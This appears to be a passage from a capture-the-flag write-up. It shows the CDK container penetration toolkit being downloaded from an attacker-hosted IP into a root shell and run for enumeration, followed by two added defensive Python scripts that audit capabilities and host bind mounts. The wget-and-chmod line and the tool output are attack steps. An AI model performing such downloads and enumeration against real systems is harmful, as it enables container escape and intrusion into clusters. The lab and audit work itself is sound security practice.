CDK - Zero Dependency Container Penetration Toolkit


Performing automated scanning with CDK after basic enumeration

cdk is an open-source container penetration toolkit designed to offer stable exploitation in different slimmed-down containers without any OS dependency. It comes with useful net-tools and many powerful PoCs/EXPs, and helps you escape the container and take over the K8s cluster easily.

/root # wget http://10.10.14.11/cdk ; chmod 755 ./cdk
connecting to 10.10.14.11 (10.10.14.11:80)
cdk                    1% |                                |  137k  0:01:24 ETA
cdk                   57% |******************              | 6713k  0:00:01 ETA
cdk                   92% |*****************************   | 10.6m  0:00:00 ETA
cdk                  100% |********************************| 11.4m  0:00:00 ETA

Delivery complete

/root # ./cdk evaluate --full
CDK (Container DucK)
cdk version(gitcommit): d9ab55702036c28e793378cc47605e21206dfef1
Zero-dependency cloudnative k8s/docker/serverless penetration toolkit by cdxy & neargle
find tutorial, configuration and use-case in https://github.com/cdk-team/CDK/
 
[  Information Gathering - System Info  ]
2023/12/27 17:37:56 current dir: /root
2023/12/27 17:37:56 current user: root uid: 0 gid: 0 home: /root
2023/12/27 17:37:56 hostname: 589113857d68
2023/12/27 17:37:56 alpine alpine 3.10.3 kernel: 5.15.0-56-generic
 
[  Information Gathering - Services  ]
2023/12/27 17:37:56 service found in process:
	1	0	python3
2023/12/27 17:37:56 service found in process:
	7	1	python3
2023/12/27 17:37:56 service found in process:
	8	1	python3
 
[  Information Gathering - Commands and Capabilities  ]
2023/12/27 17:37:56 available commands:
	wget,nc,find,ps,python,python3,vi,mount,fdisk,gcc,base64
2023/12/27 17:37:56 Capabilities hex of Caps(CapInh|CapPrm|CapEff|CapBnd|CapAmb):
	capinh:	00000000a00425fb
	capprm:	00000000a00425fb
	capeff:	00000000a00425fb
	capbnd:	00000000a00425fb
	capamb:	0000000000000000
	cap decode: 0x00000000a00425fb = CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_SETGID,CAP_SETUID,CAP_SETPCAP,CAP_NET_BIND_SERVICE,CAP_NET_RAW,CAP_SYS_CHROOT,CAP_AUDIT_WRITE,CAP_SETFCAP
[*] maybe you can exploit the capabilities below:
 
[  Information Gathering - Mounts  ]
0:57 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/DRGMD73SWUZIEBTCBZBGE4NVUC:/var/lib/docker/overlay2/l/ZDJFWZPSKIUIDARX3UFVDU45YT:/var/lib/docker/overlay2/l/UP3EQ3NNRGQS5FMQOZ6QOSXVO7:/var/lib/docker/overlay2/l/5Q5RNC7YL4VBLNOE75JSW4YK4Z:/var/lib/docker/overlay2/l/HJMPVSNJR7HDYZI6ZVBJSRWSAV:/var/lib/docker/overlay2/l/7WGNVFAKWVWHP2JEXLJ7CTZZXV:/var/lib/docker/overlay2/l/42TVFU33XU7Y46JFVGK5XO2KDN:/var/lib/docker/overlay2/l/MXUR7B4EKGHIWNQECS2U56RNJM:/var/lib/docker/overlay2/l/KDC34OJY5VUNYMCTPR2I2WADIC:/var/lib/docker/overlay2/l/BE7ULB2VTYRZZGQCJ6LCUZSKRD:/var/lib/docker/overlay2/l/DBCH4DDSQUJOOAAGEI4S3BXA2Y:/var/lib/docker/overlay2/l/HFLYWN53FGIY5IOWOHVWOR7VFY:/var/lib/docker/overlay2/l/JFKXPERB73IRPP466U2SMK2Q2J:/var/lib/docker/overlay2/l/QJEQWOQOZA2WAGRPJOUYCULJZD:/var/lib/docker/overlay2/l/M2RIPVP5DGTFN7GZGZNNXZPJCF:/var/lib/docker/overlay2/l/HMW3VBRCQOA2QCPYKD75GR63PX:/var/lib/docker/overlay2/l/2ZX5PTCMAT344WSU6GC75NALAO,upperdir=/var/lib/docker/overlay2/3ec9ef440c292f0e15a1b250279132b875fddcda2fdd802ec8dec8577ff2e3c0/diff,workdir=/var/lib/docker/overlay2/3ec9ef440c292f0e15a1b250279132b875fddcda2fdd802ec8dec8577ff2e3c0/work
0:60 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
0:61 / /dev rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:62 / /dev/pts rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666
0:63 / /sys ro,nosuid,nodev,noexec,relatime - sysfs sysfs ro
0:29 / /sys/fs/cgroup ro,nosuid,nodev,noexec,relatime - cgroup2 cgroup rw,nsdelegate,memory_recursiveprot
0:59 / /dev/mqueue rw,nosuid,nodev,noexec,relatime - mqueue mqueue rw
0:64 / /dev/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k,inode64
253:0 /root/scripts/docker/API /API rw,relatime - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
253:0 /home/svc /home/svc ro,relatime - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
253:0 /var/lib/docker/containers/589113857d68dd7d404a44f335797cde6a03cea3c20c49cceaad667236a4e998/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
253:0 /var/lib/docker/containers/589113857d68dd7d404a44f335797cde6a03cea3c20c49cceaad667236a4e998/hostname /etc/hostname rw,relatime - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
253:0 /var/lib/docker/containers/589113857d68dd7d404a44f335797cde6a03cea3c20c49cceaad667236a4e998/hosts /etc/hosts rw,relatime - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
0:60 /bus /proc/bus ro,nosuid,nodev,noexec,relatime - proc proc rw
0:60 /fs /proc/fs ro,nosuid,nodev,noexec,relatime - proc proc rw
0:60 /irq /proc/irq ro,nosuid,nodev,noexec,relatime - proc proc rw
0:60 /sys /proc/sys ro,nosuid,nodev,noexec,relatime - proc proc rw
0:60 /sysrq-trigger /proc/sysrq-trigger ro,nosuid,nodev,noexec,relatime - proc proc rw
0:65 / /proc/acpi ro,relatime - tmpfs tmpfs ro,inode64
0:61 /null /proc/kcore rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:61 /null /proc/keys rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:61 /null /proc/timer_list rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:66 / /proc/scsi ro,relatime - tmpfs tmpfs ro,inode64
0:67 / /sys/firmware ro,relatime - tmpfs tmpfs ro,inode64
 
[  Information Gathering - Net Namespace  ]
	container net namespace isolated.
 
[  Information Gathering - Sysctl Variables  ]
2023/12/27 17:37:56 net.ipv4.conf.all.route_localnet = 0
 
[  Information Gathering - DNS-Based Service Discovery  ]
error when requesting coredns: lookup any.any.svc.cluster.local. on 127.0.0.11:53: server misbehaving
error when requesting coredns: lookup any.any.any.svc.cluster.local. on 127.0.0.11:53: server misbehaving
 
[  Discovery - K8s API Server  ]
2023/12/27 17:37:56 checking if api-server allows system:anonymous request.
err found while searching local k8s apiserver addr.:
err: cannot find kubernetes api host in ENV
	api-server forbids anonymous request.
	response:
 
[  Discovery - K8s Service Account  ]
load k8s service account token error.:
open /var/run/secrets/kubernetes.io/serviceaccount/token: no such file or directory
 
[  Discovery - Cloud Provider Metadata API  ]
2023/12/27 17:37:57 failed to dial Alibaba Cloud API.
2023/12/27 17:37:58 failed to dial Azure API.
2023/12/27 17:37:59 failed to dial Google Cloud API.
2023/12/27 17:38:00 failed to dial Tencent Cloud API.
2023/12/27 17:38:01 failed to dial OpenStack API.
2023/12/27 17:38:02 failed to dial Amazon Web Services (AWS) API.
2023/12/27 17:38:03 failed to dial ucloud API.
 
[  Exploit Pre - Kernel Exploits  ]
 
[  Information Gathering - Sensitive Files  ]
	.dockerenv - /.dockerenv
	/.bash_history - /home/svc/.bash_history
	/.bashrc - /home/svc/.bashrc
 
[  Information Gathering - ASLR  ]
2023/12/27 17:38:04 /proc/sys/kernel/randomize_va_space file content: 2
2023/12/27 17:38:04 ASLR is enabled.
 
[  Information Gathering - Cgroups  ]
2023/12/27 17:38:04 /proc/1/cgroup file content:
	0::/
2023/12/27 17:38:04 /proc/self/cgroup file added content (compare pid 1) :
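To show what CDK's "cap decode" line is doing, and to turn it into a check a defender can run against any container, here is an added Python example (not code from the original writeup or from the CDK project) that decodes a capability mask from /proc/<pid>/status into CAP_* names and compares the result with Docker's documented default capability set. The STATUS_SAMPLE text is constructed from the Cap* values CDK printed above; the HIGH_RISK_CAPS selection is my own and is not exhaustive.

```python
"""Decode Linux capability masks the way CDK's "cap decode" line does, then
compare the result with Docker's default capability set.
Added example; not code from the original writeup or from CDK."""
from __future__ import annotations

# Capability bit numbers from include/uapi/linux/capability.h (index == CAP_* value).
CAP_NAMES = [
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER", "CAP_FSETID",
    "CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP", "CAP_LINUX_IMMUTABLE",
    "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST", "CAP_NET_ADMIN", "CAP_NET_RAW",
    "CAP_IPC_LOCK", "CAP_IPC_OWNER", "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT",
    "CAP_SYS_PTRACE", "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE",
    "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD", "CAP_LEASE",
    "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP", "CAP_MAC_OVERRIDE",
    "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM", "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ",
    "CAP_PERFMON", "CAP_BPF", "CAP_CHECKPOINT_RESTORE",
]

# Capabilities Docker grants by default to a non-privileged container (per the
# "Runtime privilege and Linux capabilities" section of the docker run reference).
DOCKER_DEFAULT_CAPS = {
    "CAP_AUDIT_WRITE", "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FOWNER", "CAP_FSETID",
    "CAP_KILL", "CAP_MKNOD", "CAP_NET_BIND_SERVICE", "CAP_NET_RAW", "CAP_SETFCAP",
    "CAP_SETGID", "CAP_SETPCAP", "CAP_SETUID", "CAP_SYS_CHROOT",
}

# Hand-picked selection (an assumption, not an exhaustive list) of capabilities whose
# presence in a container warrants review because they reach into the host kernel,
# other processes, or arbitrary files.
HIGH_RISK_CAPS = {
    "CAP_SYS_ADMIN", "CAP_SYS_PTRACE", "CAP_SYS_MODULE", "CAP_SYS_RAWIO",
    "CAP_DAC_READ_SEARCH", "CAP_NET_ADMIN", "CAP_BPF", "CAP_PERFMON",
}

# Constructed /proc/<pid>/status fragment using the Cap* values CDK printed above.
STATUS_SAMPLE = """\
Name:\tsh
Uid:\t0\t0\t0\t0
CapInh:\t00000000a00425fb
CapPrm:\t00000000a00425fb
CapEff:\t00000000a00425fb
CapBnd:\t00000000a00425fb
CapAmb:\t0000000000000000
"""


def decode_cap_mask(hex_mask: str) -> list[str]:
    """Turn a 64-bit hex capability mask into CAP_* names, lowest bit first."""
    mask = int(hex_mask, 16)
    names = []
    for bit in range(mask.bit_length()):
        if (mask >> bit) & 1:
            # Bits above the last capability this table knows get a numeric
            # placeholder instead of a wrong name (newer kernels add capabilities).
            names.append(CAP_NAMES[bit] if bit < len(CAP_NAMES) else f"CAP_UNKNOWN_{bit}")
    return names


def parse_proc_status_caps(status_text: str) -> dict[str, str]:
    """Extract the five Cap* masks from /proc/<pid>/status text, keyed the way
    CDK prints them (capinh, capprm, capeff, capbnd, capamb)."""
    caps = {}
    for line in status_text.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.startswith("Cap"):
            caps[key.lower()] = value.strip()
    return caps


def audit_caps(hex_mask: str) -> dict[str, list[str]]:
    """Compare one mask with Docker's default set and with the high-risk selection."""
    granted = decode_cap_mask(hex_mask)
    have = set(granted)
    return {
        "granted": granted,
        "beyond_docker_default": sorted(have - DOCKER_DEFAULT_CAPS),
        "dropped_from_default": sorted(DOCKER_DEFAULT_CAPS - have),
        "high_risk": sorted(have & HIGH_RISK_CAPS),
    }


if __name__ == "__main__":
    # On a live system read the real file instead: open("/proc/self/status").read()
    caps = parse_proc_status_caps(STATUS_SAMPLE)
    for field in ("capinh", "capprm", "capeff", "capbnd", "capamb"):
        decoded = ",".join(decode_cap_mask(caps[field])) or "(none)"
        print(f"{field}: {caps[field]} = {decoded}")
    report = audit_caps(caps["capeff"])
    print("beyond Docker default:", report["beyond_docker_default"] or "none")
    print("dropped from default:", report["dropped_from_default"] or "none")
    print("high-risk:", report["high_risk"] or "none")
```

For the mask above the decode matches CDK's thirteen names exactly; the audit reports nothing beyond Docker's default set and CAP_MKNOD as the only default capability this container does not hold. The same three lists are what to look at on any container: anything in "beyond Docker default" or "high-risk" is a deviation worth tracing back to a --cap-add or --privileged flag.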

As expected, the host system's /home/svc is mounted to /home/svc of the current Docker container (read-only, per the ro mount option). Additionally, the host system's /root/scripts/docker/API is mounted to the /API directory of the current Docker container (read-write).
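The conclusion above comes from reading the mount table by hand. As an added example (not code from the original writeup or from CDK), the Python below parses the mount lines CDK printed, which are /proc/self/mountinfo entries with the leading mount-id and parent-id fields dropped, and flags every mount that exposes a host filesystem path inside the container while ignoring pseudo-filesystems and Docker's own per-container bind mounts of resolv.conf, hostname and hosts. It also accepts raw mountinfo lines, so the same check runs on a live container. The MOUNTS_SAMPLE lines are copied from the output above, with the overlay line's long lowerdir list abbreviated; the PSEUDO_FS set is my own selection.

```python
"""Find host paths bind-mounted into a container from its mount table.
Added example; not code from the original writeup or from CDK."""
from __future__ import annotations
from dataclasses import dataclass

# Lines copied from the "Information Gathering - Mounts" output above (the overlay
# line's lowerdir list is abbreviated to one entry here).
MOUNTS_SAMPLE = """\
0:57 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/DRGMD73SWUZIEBTCBZBGE4NVUC,upperdir=/var/lib/docker/overlay2/3ec9ef440c292f0e15a1b250279132b875fddcda2fdd802ec8dec8577ff2e3c0/diff,workdir=/var/lib/docker/overlay2/3ec9ef440c292f0e15a1b250279132b875fddcda2fdd802ec8dec8577ff2e3c0/work
0:60 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
0:61 / /dev rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:63 / /sys ro,nosuid,nodev,noexec,relatime - sysfs sysfs ro
0:29 / /sys/fs/cgroup ro,nosuid,nodev,noexec,relatime - cgroup2 cgroup rw,nsdelegate,memory_recursiveprot
253:0 /root/scripts/docker/API /API rw,relatime - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
253:0 /home/svc /home/svc ro,relatime - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
253:0 /var/lib/docker/containers/589113857d68dd7d404a44f335797cde6a03cea3c20c49cceaad667236a4e998/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
253:0 /var/lib/docker/containers/589113857d68dd7d404a44f335797cde6a03cea3c20c49cceaad667236a4e998/hostname /etc/hostname rw,relatime - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
0:60 /sysrq-trigger /proc/sysrq-trigger ro,nosuid,nodev,noexec,relatime - proc proc rw
0:61 /null /proc/kcore rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64
0:67 / /sys/firmware ro,relatime - tmpfs tmpfs ro,inode64
"""

# Filesystem types that never carry host disk contents directly (my selection).
PSEUDO_FS = {
    "overlay", "proc", "sysfs", "tmpfs", "devpts", "mqueue", "cgroup", "cgroup2",
    "devtmpfs", "securityfs", "debugfs", "tracefs", "bpf", "fusectl", "configfs",
}

# Docker bind-mounts resolv.conf, hostname and hosts from its own per-container
# directory; those are expected and are not a user-supplied volume.
DOCKER_MANAGED_PREFIX = "/var/lib/docker/containers/"


@dataclass
class Mount:
    dev: str          # major:minor of the backing device
    root: str         # path inside the backing filesystem that is mounted
    mount_point: str  # where it appears inside the container
    options: str      # per-mount-point options (rw/ro, nosuid, ...)
    fstype: str
    source: str


def _unescape(field: str) -> str:
    # mountinfo escapes space, tab, newline and backslash as octal sequences.
    for esc, ch in (("\\040", " "), ("\\011", "\t"), ("\\012", "\n"), ("\\134", "\\")):
        field = field.replace(esc, ch)
    return field


def parse_mount_line(line: str) -> Mount:
    """Accept either a raw /proc/self/mountinfo line or the trimmed form CDK prints."""
    left, sep, right = line.partition(" - ")
    if not sep:
        raise ValueError(f"no ' - ' separator in mount line: {line!r}")
    fields = left.split()
    if ":" not in fields[0]:      # raw mountinfo starts with "mount_id parent_id"
        fields = fields[2:]
    dev, root, mount_point, options = fields[:4]   # anything after is optional tags
    parts = right.split(None, 2)
    fstype = parts[0]
    source = parts[1] if len(parts) > 1 else ""
    return Mount(dev, _unescape(root), _unescape(mount_point), options,
                 fstype, _unescape(source))


def parse_mounts(text: str) -> list[Mount]:
    return [parse_mount_line(line) for line in text.splitlines() if line.strip()]


def host_path_mounts(mounts: list[Mount]) -> list[tuple[str, str, str]]:
    """Return (mount_point, host_path, 'rw'|'ro') for every mount of a real
    filesystem whose source path is not one of Docker's own per-container files."""
    findings = []
    for m in mounts:
        if m.fstype in PSEUDO_FS or m.root.startswith(DOCKER_MANAGED_PREFIX):
            continue
        mode = "rw" if "rw" in m.options.split(",") else "ro"
        findings.append((m.mount_point, m.root, mode))
    return findings


if __name__ == "__main__":
    # On a live container: parse_mounts(open("/proc/self/mountinfo").read())
    for mount_point, host_path, mode in host_path_mounts(parse_mounts(MOUNTS_SAMPLE)):
        print(f"{mode}  {mount_point:<12} <- host {host_path}")
```

Run against the table above it reports exactly the two mounts the paragraph names, /API read-write from /root/scripts/docker/API and /home/svc read-only from /home/svc. A root of / on a disk filesystem would also be reported, which is the case to treat most seriously since it means an entire host device is visible.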